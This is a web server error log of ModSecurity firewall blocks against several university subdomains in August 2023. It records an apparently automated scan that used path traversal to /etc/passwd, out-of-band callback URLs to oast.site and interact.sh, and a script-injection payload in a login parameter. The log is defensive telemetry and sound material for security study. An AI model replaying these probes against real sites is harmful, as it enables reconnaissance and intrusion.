[Tue Aug 29 11:54:55.572623 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqWwa4AAAAl"]
[Tue Aug 29 11:54:55.579268 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-cAAAAE"]
[Tue Aug 29 11:54:55.592840 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0jx5t7e4mssn7k.oast.site found within TX:1: cjmnijtjmimvgniikdb0jx5t7e4mssn7k.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqUB6gAAAAb"]
[Tue Aug 29 11:54:55.593149 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb01noqnu5kdgros.oast.site found within TX:1: cjmnijtjmimvgniikdb01noqnu5kdgros.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApHRaUAAAAP"]
[Tue Aug 29 11:54:55.595501 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ahu6m9nsxtrx1.oast.site found within TX:1: cjmnijtjmimvgniikdb0ahu6m9nsxtrx1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApa-I0AAAAg"]
[Tue Aug 29 11:54:55.636826 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ge4jn9qufd414.oast.site found within TX:1: cjmnijtjmimvgniikdb0ge4jn9qufd414.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApbUYcAAAAh"]
[Tue Aug 29 11:54:56.539860 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0j1ahsszf5d51n.oast.site found within TX:1: cjmnijtjmimvgniikdb0j1ahsszf5d51n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApa-JQAAAAg"]
[Tue Aug 29 11:54:56.568509 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqhOAEAAAAE"]
[Tue Aug 29 11:54:56.589376 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0jt67myead3f9o.oast.site found within TX:1: cjmnijtjmimvgniikdb0jt67myead3f9o.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApa-JUAAAAg"]
[Tue Aug 29 11:54:56.672688 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApk-aIAAAAn"]
[Tue Aug 29 11:54:56.678717 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16IMCo-f0AAAoAk88AAAAC"]
[Tue Aug 29 11:54:56.729123 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApHRasAAAAP"]
[Tue Aug 29 11:54:56.732908 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqWwbgAAAAl"]
[Tue Aug 29 11:54:56.782333 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAoAk9IAAAAC"]
[Tue Aug 29 11:54:57.539635 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqRzGgAAAAM"]
[Tue Aug 29 11:54:57.539689 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqRzGgAAAAM"]
[Tue Aug 29 11:54:57.626652 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqWwbwAAAAl"]
[Tue Aug 29 11:54:57.626727 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqWwbwAAAAl"]
[Tue Aug 29 11:54:57.880039 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqhOAoAAAAE"]
[Tue Aug 29 11:54:57.880120 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqhOAoAAAAE"]
[Tue Aug 29 11:54:57.892941 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApbUZMAAAAh"]
[Tue Aug 29 11:54:57.893013 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApbUZMAAAAh"]
[Tue Aug 29 11:54:58.078869 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApk-aYAAAAn"]
[Tue Aug 29 11:54:58.216102 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAApXgjEAAAAU"]
[Tue Aug 29 11:54:58.245243 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmYAAAAN"]
[Tue Aug 29 11:54:58.300150 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmcAAAAN"]
[Tue Aug 29 11:54:58.300412 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqRzG0AAAAM"]
[Tue Aug 29 11:54:58.308502 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-QAAAAS"]
[Tue Aug 29 11:54:58.308590 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAoz7-QAAAAS"]
[Tue Aug 29 11:54:58.673062 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcQAAAAl"]
[Tue Aug 29 11:54:58.673316 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqWwcQAAAAl"]
[Tue Aug 29 11:54:58.742421 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqSwmwAAAAN"]
[Tue Aug 29 11:54:59.577088 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApa-J8AAAAg"]
[Tue Aug 29 11:54:59.636828 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoAk9sAAAAC"]
[Tue Aug 29 11:54:59.644548 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16I8Co-f0AAAqWwckAAAAl"]
[Tue Aug 29 11:54:59.644580 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApXgjYAAAAU"]
[Tue Aug 29 11:54:59.648971 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqRzHEAAAAM"]
[Tue Aug 29 11:54:59.657783 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoz7-oAAAAS"]
[Tue Aug 29 11:54:59.777397 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqY5@EAAAAr"]
[Tue Aug 29 11:54:59.778504 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqSwnAAAAAN"]
[Tue Aug 29 11:54:59.807788 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqTvmwAAAAa"]
